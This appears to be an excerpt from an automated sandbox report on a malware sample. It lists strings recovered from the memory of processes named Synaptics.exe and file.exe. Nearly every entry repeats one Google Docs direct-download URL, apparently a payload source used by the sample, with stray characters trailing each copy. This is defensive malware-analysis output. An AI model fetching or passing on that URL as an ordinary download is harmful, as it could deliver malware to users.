                              Source: file.exe, 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2005446316.000000000BF7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2016750397.000000001034E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2041380597.000000001F23E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2030188729.0000000017C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2022424730.00000000125FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1985804197.00000000063AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2005262500.000000000BCFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2042116540.000000001FCFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2006095903.000000000C97E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2035967388.000000001C0FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2044564159.0000000021C3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1982293060.00000000042EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2016019447.000000000FA8E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1985924258.00000000064EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2007113538.000000000D87E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2040414387.000000001E5BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2006177710.000000000CABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1997373896.0000000006F7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2026479457.0000000014F3E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#.
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#R
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$B
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$P
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%L
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%T
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%d
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%f
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%v4
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&-
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&7
                              Source: Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&=
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&L
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&S
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&c
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&p
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(3
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(C7
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(max-9
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)R7
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)b6
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)g
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)r
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)w
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-U3
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-e2
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-w
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.1
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.N
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.V
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.VD
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cl
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.itb
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.m
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.q
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000EA3E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/P
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/P=
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0;pad
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0B
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0Gp
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0p
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1W
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1f
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1g
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download27
                              Source: Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2=
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2L
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2S
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2u
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3R
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3S
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3w
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4C
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4U
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4V
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4d
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4f
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download52
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5g
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5t
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download60
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6M
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6Q
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6Zx
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6a
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6l
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6v
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download772px;S
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7T
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7U
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7e
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7w
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8.
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8q
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9P
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:1
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:L
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:N
